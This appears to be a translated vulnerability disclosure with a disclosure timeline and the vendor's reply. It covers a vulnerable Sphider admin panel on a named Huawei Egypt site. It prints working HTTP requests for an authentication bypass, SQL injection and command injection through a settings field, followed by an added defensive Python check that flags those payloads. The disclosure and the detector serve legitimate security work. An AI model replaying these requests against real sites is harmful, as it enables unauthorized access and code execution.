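2014-08-08: Details reported to the vendor; awaiting vendor handling
2014-08-12: Vendor has confirmed; details disclosed to the vendor only
2014-08-22: Details disclosed to core white hats and experts in related fields
2014-09-01: Details disclosed to regular white hats
2014-09-11: Details disclosed to intern white hats
2014-09-22: Details disclosed to the public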
1. Unauthorized access to the admin backend
2. SQL injection
3. Command execution
Affected URL: http://www.huaweidevice.com.eg/huawei_ar/sphider/admin/admin.php, which runs a vulnerable version of Sphider.
1. Unauthorized access to the admin backend. Request:
POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

user=admin&pass=bar
2. SQL injection. Request:
POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

user=foo&pass=bar&f=20&site_id=1%df'
3. Command execution. Request (retrieves phpversion()):
POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7fabfda77b710466db1a18d65031fa66
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 523

user=foo&pass=bar&f=settings&Submit=ion_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100&_pdftotext_path=&_catdoc_path=&_xls2csv_path=&_catppt_path=&_user_agent=&_min_delay=0&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_desc_length=250&_suggest_rows=0&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5;echo%20phpversion();
No need to go as far as a shell, right?
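An added example, not part of the original report and not Sphider's own code: an allow-list check that a filter in front of admin.php, or a review of logged POST bodies, could apply to requests 2 and 3 above. It assumes the fields that carry integers in those requests are meant to be integer-only; `audit_admin_post` and `INTEGER_FIELDS` are names invented for this sketch.

```python
import re
from urllib.parse import unquote_to_bytes

# Fields that carry only integers in the requests shown in the report.
# Treating them as integer-only is this example's assumption,
# not something taken from Sphider documentation.
INTEGER_FIELDS = {
    "site_id", "_min_words_per_page", "_min_word_length", "_word_upper_bound",
    "_min_delay", "_results_per_page", "_cat_columns", "_bound_search_result",
    "_length_of_link_desc", "_links_to_next", "_desc_length", "_suggest_rows",
    "_title_weight", "_domain_weight", "_path_weight", "_meta_weight",
}
DIGITS = re.compile(rb"[0-9]{1,9}")

# Bodies taken from the report's three requests (the third is shortened).
SAMPLE_BODIES = [
    "user=admin&pass=bar",
    "user=foo&pass=bar&f=20&site_id=1%df'",
    "user=foo&pass=bar&f=settings&_title_weight=20&_meta_weight=5;echo%20phpversion();",
]


def audit_admin_post(body: str) -> list[str]:
    """Return one finding per suspicious field in a form-urlencoded POST body."""
    findings = []
    # Split on '&' only, so a ';' inside a value stays part of that value.
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_to_bytes(raw.replace("+", " "))
        try:
            value.decode("utf-8")
        except UnicodeDecodeError:
            # e.g. a lone lead byte such as %df followed by a quote
            findings.append(f"{name}: bytes are not valid UTF-8")
            continue
        if name in INTEGER_FIELDS and not DIGITS.fullmatch(value):
            findings.append(f"{name}: expected an integer")
    return findings


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(audit_admin_post(body) or "no findings")
```

The first body produces no findings: the unauthorized access in request 1 is an authentication problem that input validation cannot catch, so it needs a fix in the login check itself.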
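Severity: High
Vulnerability Rank: 15
Confirmed: 2014-08-12 11:19
Thanks to the white hat for the attention to Huawei; the relevant business department is working on fixing this vulnerability.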